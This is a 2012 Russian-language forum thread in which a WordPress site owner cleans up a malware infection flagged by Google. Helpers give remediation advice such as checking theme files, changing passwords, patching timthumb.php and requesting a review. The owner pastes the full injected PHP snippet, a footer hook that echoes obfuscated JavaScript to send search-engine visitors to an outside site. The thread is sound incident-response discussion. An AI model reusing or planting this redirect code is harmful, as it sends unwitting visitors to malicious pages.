[Помогите] Google сетует на вирус на сайте

Тема в разделе "Wordpress", создана пользователем nizulko, 20 апр 2012.

Статус темы:
Закрыта.
Модераторы: Sorcus
  1. nizulko

    nizulko

    Регистр.:
    5 ноя 2007
    Сообщения:
    165
    Симпатии:
    16
    Коллеги, буквально пару часов назад захожу на сайт и вижу картинку...

    Залез в код главной странички, ничего подозрительного не обнаружил.

    Как такое могло произойти, что делать?
     

    Вложения:

    • 111.png
      111.png
      Размер файла:
      43,9 КБ
      Просмотров:
      15
  2. latteo

    latteo Эффективное использование PHP, MySQL

    Moderator
    Регистр.:
    28 фев 2008
    Сообщения:
    1.450
    Симпатии:
    1.244
    Внизу страницы JS код, начинающийся с <script language="JavaScript">eval(function(p,a,c,k,e,r)
    удали и будет тебе счастье через несколько дней, когда ПС переиндексирует сайт (в гугл вебмастерс кажется можно ускорить)
     
  3. nizulko

    nizulko

    Регистр.:
    5 ноя 2007
    Сообщения:
    165
    Симпатии:
    16
    А нет такой функции на страничке - ни в начале, ни в конце. Сайт на Вордпрессе.
     
  4. latteo

    latteo Эффективное использование PHP, MySQL

    Moderator
    Регистр.:
    28 фев 2008
    Сообщения:
    1.450
    Симпатии:
    1.244
    Ты как проверяешь, что нет такого кода?
    Вирусы нынче умные пошли, вполне возможно, что он не для всех выводится(фильр например по признаку залогининости в админ панель).
    Пересмотри код шаблона, уделив особое внимание файлам footer и function, так же могут быть заражены плагины, вероятность заразы в других местах значительно ниже.

    Прилагаю html копию страницы, password:123
     

    Вложения:

    • vir-hhvd.rar
      Размер файла:
      4,5 КБ
      Просмотров:
      4
    nizulko нравится это.
  5. nizulko

    nizulko

    Регистр.:
    5 ноя 2007
    Сообщения:
    165
    Симпатии:
    16
    Огромная благодарность. Нашел в файле с функциями такой кусок:

    PHP:
    <?php
    add_action
    ('get_footer''add_sscounter');
        function 
    add_sscounter(){
            echo 
    '<!--scounter-->';
            if(
    function_exists('is_user_logged_in')){
                if(
    time()%== && !is_user_logged_in()){           
                    echo 
    "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
                }
            }
        }
    ?>
    Вопрос - что делает, как и когда он мог туда залететь, если пару часов назад все было окей... или просто Гугл мне не говорил об этом?!
     
  6. Grigirij

    Grigirij $$$

    Регистр.:
    25 сен 2008
    Сообщения:
    699
    Симпатии:
    331
    посмотри по дате последнего изменения в этом файле и поймёшь возможно когда его туда впихнули.
    гугл мог не сразу определить, что это вирусняк.
    Вариантов внедрения много от дырок в двиге или модов и до палева паролей для доступа к хостингу, фтп, админок...
    Для начала поменяй все пароли доступа, а потом думай о наличии дырок. Могли также и через соседей залезать.
    также шел советую поискать.
     
    nizulko нравится это.
  7. polyetilen

    polyetilen Заблокирован

    Регистр.:
    10 авг 2006
    Сообщения:
    814
    Симпатии:
    474
    Видно используестя файл timthumb.php, который давно славится дыркой в безопасности, загружает всё подряд и картинки и php скрипты на сервер
    wp-content/plugins/simple-post-thumbnails/timthumb.php
    в новой версии исправлено
    http://timthumb.googlecode.com/svn/trunk/timthumb.php
    надо версии сверить в начале файла
    define ('VERSION', '...')
    может через этот скрипт взломали.
    Можно зарегестрироватся в google webmasters tools https://www.google.com/webmasters/tools/
    там добавить свой сайт и в диагностике будет анализ про вредные скрипты и ссылки где находится, всё поисправлять поудалять, и отослать заявку что почищено всё.
    там же на google webmasters tools
    или тут
    http://www.stopbadware.org/home/reviewinfo

    ещё что делать
    http://support.google.com/webmasters/bin/answer.py?hl=ru&answer=163635
    http://support.google.com/webmasters/bin/answer.py?hl=ru&answer=163633

    ещё тут полно сканеров
    https://badwarebusters.org/main/itemview/23594
    например
    http://sitecheck.sucuri.net/results/http://hhvd.ru
    найден вредный скрипт в конце страницы
     
    nizulko нравится это.
  8. nizulko

    nizulko

    Регистр.:
    5 ноя 2007
    Сообщения:
    165
    Симпатии:
    16
    Заменил файлик по ссылке.
    И вновь в бане... Теперь уже в функциях ничего не вижу.
     
  9. latteo

    latteo Эффективное использование PHP, MySQL

    Moderator
    Регистр.:
    28 фев 2008
    Сообщения:
    1.450
    Симпатии:
    1.244
    Eset обзывает его redirector - редирект на другой сайт происходит при скрипта выполнении.

    Бан не сразу снимают, а в течении некоторого времени от нескольких дней до нескольких недель.
    Чуть выше polyetilen хорошо расписал как можно скорить выход из бана.
     
    nizulko нравится это.
  10. nizulko

    nizulko

    Регистр.:
    5 ноя 2007
    Сообщения:
    165
    Симпатии:
    16
    Странно. Как только вырезал код - Хром перестал ругаться.
    А вы что-нибудь подозрительное на главной странице видите?
     
Статус темы:
Закрыта.